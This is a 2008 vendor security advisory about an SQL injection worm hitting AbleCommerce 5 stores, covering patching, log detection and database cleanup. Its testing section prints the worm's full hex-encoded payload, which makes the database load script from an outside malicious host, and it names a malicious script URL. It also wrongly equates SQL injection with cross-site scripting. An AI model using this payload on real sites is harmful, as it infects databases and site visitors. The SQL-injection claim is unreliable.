Potential SQL Injection in AbleCommerce 5

Version: AbleCommerce 5.x Asp.Net and AbleCommerce 5.x CFMX

Severity: Critical (potentially)

Applies to: All Versions

Release Date:  8/28/2008

 

DETAILS

OVERVIEW and PREVENTION

Recently, a few AbleCommerce stores have been under attack by a new SQL injection worm circulating the internet.  The worm is targeting scripted pages that are posting information to an MS-SQL database.  So, any page that has a field where input can be entered, is a potential problem source.  

For AbleCommerce stores, the attack has mainly targeted older versions of AbleCommerce 5.2 and 5.5.  If you have been keeping your store updated with all the latest patches and updates, then you should be fine.  However, holes can still exist, either in a customization or a store template that wasn’t part of a core upgrade.  Therefore, AbleCommerce has released a global solution which can easily remedy any potential injection attacks.  The fix is quick and will prevent any harm to your store.  

Pick the applicable fix above, download the fix and open the readme.txt for further instructions.  

IMPORTANT:  ALL AbleCommerce 5.x stores should be patched because of the potential seriousness of this issue.  A successful intrusion attempt can disable your database, bring down your store, and worse, infect your users.

 

What is an SQL injection attack?

SQL injection is also know as cross-site scripting.  The cross-site scripting attack is one of the most common, yet overlooked, security problems facing web developers today. A web site is vulnerable if it displays user-submitted content without checking for malicious script tags.

The target of cross-site scripting attacks is not the server itself, but the user files on the server, such as forms and other dynamic content. All a malicious attacker needs to do is find a page that does not properly sanitize user input, but returns the scripting code verbatim to the browser of a visitor to that website. It is important to note that websites that use SSL are just as vulnerable as websites that do not encrypt browser sessions.

The damage caused by such an attack can range from stealing session and cookie data from your customers to loading a virus payload onto their computer via browser.

The pages listed in the vulnerability output will display embedded javascript with no filtering back to the user.  

 

How do I know if my store has been attacked?

If an attack is successful, there would be links to malicious javascript inserted into the text fields of your database.  This in turn, can be displayed on your website and potentially harm your users' computers.

The SQL injection can scan all the tables in the database so it might be difficult to know what data has been corrupted.  We have had reports of the STORES table being injected with bad code and this would immediately shut down your store.  Other reports have included the COUNTRIES table and USERS table.  Unfortunately, there is no one table to look at so the easiest detection will be to look at your website logs.

You will want to search for something like this:

DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b…

 

What should I do if my database has been corrupted?

  • First, you should apply the AbleCommerce patch right away so any further attacks can be prevented.  We have found that once the worm finds it's way into your database, it won't stop.

  • Next, you will need to clean your data of any malicious javascript.  It should be obvious where the code has been appended to your existing data.  It might look something like this:

    www0.douhunqn.cn/csrss/w.js


    Depending on your ability to find and update SQL databases, this task will be different for everyone.  You can also restore a backup of the database that is known to be clean.

 

Testing for Vulnerabilities

If you have custom pages and you want to make sure they are protected with the patch, you can try this quick test:

Make a URL to your website where you will be swapping out the pieces with your domain, path, and page in question.

e.g.   http://www.server.url/path/page.aspx

Now, append the URL with the following so it looks something like this:

(due to formatting issues on this page, you'll need to remove the extra line breaks so it is a single string)

http://www.server.url/path/page.aspx?';DECLARE%20@S%20CHAR(4000);SET%20@S=
CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861
72283430303029204445434C415245205461626C655F437572736F7220435552534F522046
4F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A656
3747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E
6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E7874
7970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729
204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D2020546
1626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F53
54415455533D302920424547494E20657865632827757064617465205B272B40542B275D20
736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736
372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273
732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B2720
6E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D226874
74703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F73637
26970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437
572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F
72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

 

If the file is protected, then you should receive the message "Invalid Request"

Any pages outside of the AbleCommerce program should be checked.  This is your responsibility.

The general solution is to HTML encode data before sending it to the browser.  There are many services on the internet which can help.

 

How do I get more information?

Here are a couple websites that we found to be helpful.  You can also search for 'sql injection' on google.com

http://www.sqlsecurity.com/

http://www.f-secure.com/weblog/archives/00001427.html

http://www.trustedsource.org/blog/142/New-SQL-Injection-Attack-Infecting-Machines